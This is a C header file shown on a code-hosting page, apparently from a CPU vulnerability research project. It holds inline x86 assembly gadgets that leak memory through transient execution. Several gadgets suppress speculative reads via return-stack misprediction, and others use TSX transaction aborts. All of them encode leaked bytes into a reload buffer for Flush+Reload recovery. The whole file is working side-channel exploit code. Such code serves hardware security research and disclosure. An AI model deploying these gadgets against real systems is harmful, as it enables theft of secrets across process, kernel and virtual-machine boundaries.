-
Notifications
You must be signed in to change notification settings - Fork 55
/
leak_code.h
147 lines (139 loc) · 3.69 KB
/
leak_code.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
/* Speculated read, suppressed with RSB misprediction. */
static inline __attribute__((always_inline)) void speculate_leak_normal(unsigned char *leak, unsigned char *reloadbuffer) {
asm volatile(
// call which never returns
"call 2f\n"
// speculated read
"movq (%0), %%rax\n"
"andq $0xff, %%rax\n"
"shl $0xa, %%rax\n"
"prefetcht0 (%%rax, %1)\n"
// infinite loop
"3: pause\n"
"jmp 3b\n"
// call target
"2:\n"
"movabs $1f, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"mov %%eax, (%%rsp)\n"
"retq\n"
// actual return point
"1:\n"
::"r"(leak), "r"(reloadbuffer):"rax"
);
}
/* Speculated read, suppressed with RSB misprediction, with a clflush. */
static inline __attribute__((always_inline)) void speculate_leak_clflush(unsigned char *leak, unsigned char *reloadbuffer, unsigned char *to_flush) {
asm volatile(
// call which never returns
"call 2f\n"
// flush a page
"clflush (%2)\n"
// speculated read
"movq (%0), %%rax\n"
"andq $0xff, %%rax\n"
"shl $0xa, %%rax\n"
"prefetcht0 (%%rax, %1)\n"
// infinite loop
"3: pause\n"
"jmp 3b\n"
// call target
"2:\n"
"movabs $1f, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"imulq $1, %%rax, %%rax\n"
"mov %%eax, (%%rsp)\n"
"retq\n"
// actual return point
"1:\n"
::"r"(leak), "r"(reloadbuffer),"r"(to_flush):"rax"
);
}
/* cache-conflict TSX abort (temporal), plus a clflush */
static inline __attribute__((always_inline)) void tsxabort_leak_clflush(unsigned char *leak, unsigned char *reloadbuffer, unsigned char *flushbuffer) {
asm volatile(
// leak setup
"clflush (%0)\n"
"sfence\n"
// clflush
"clflush (%2)\n"
// transaction
"xbegin 1f\n"
"movzbq 0x0(%0), %%rax\n"
"shl $0xa, %%rax\n"
"movzbq (%%rax, %1), %%rax\n"
"xend\n"
"1:\n"
::"r"(leak), "r"(reloadbuffer), "r"(flushbuffer):"rax"
);
}
/* tsxabort_leak_clflush with a bitshift to get bytes at non-zero offsets */
static inline __attribute__((always_inline)) void tsxabort_leak_clflush_shifted(unsigned char *leak, unsigned char *reloadbuffer, unsigned char *flushbuffer, uint8_t shift) {
asm volatile(
// leak setup
"clflush (%0)\n"
"sfence\n"
// clflush
"clflush (%0)\n"
// transaction
"xbegin 1f\n"
"movdqu 0x0(%0), %%xmm0\n"
"movq %%xmm0, %%rax\n"
"shr %%cl, %%rax\n"
"and $0xff, %%rax\n"
"shl $0xa, %%rax\n"
"movzbq (%%rax, %1), %%rax\n"
"xend\n"
"1:\n"
::"r"(leak), "r"(reloadbuffer), "r"(flushbuffer), "c"(shift):"rax","xmm0"
);
}
/* cache-conflict TSX abort (temporal), bare */
static inline __attribute__((always_inline)) void tsxabort_leak_bareconflict(unsigned char *leak, unsigned char *reloadbuffer, unsigned char *flushbuffer) {
asm volatile(
// leak setup
"clflush (%0)\n"
"sfence\n"
// transaction
"xbegin 1f\n"
"movzbq 0x0(%0), %%rax\n"
"shl $0xa, %%rax\n"
"movzbq (%%rax, %1), %%rax\n"
"xend\n"
"1:\n"
::"r"(leak), "r"(reloadbuffer), "r"(flushbuffer):"rax"
);
}
/* just read from a pointer inside TSX */
static inline __attribute__((always_inline)) void tsx_leak_read_normal(unsigned char *leak, unsigned char *reloadbuffer) {
asm volatile(
"xbegin 1f\n"
"movzbq 0x0(%0), %%rax\n"
"shl $0xa, %%rax\n"
"movzbq (%%rax, %1), %%rax\n"
"xend\n"
"1:\n"
::"r"(leak), "r"(reloadbuffer):"rax"
);
}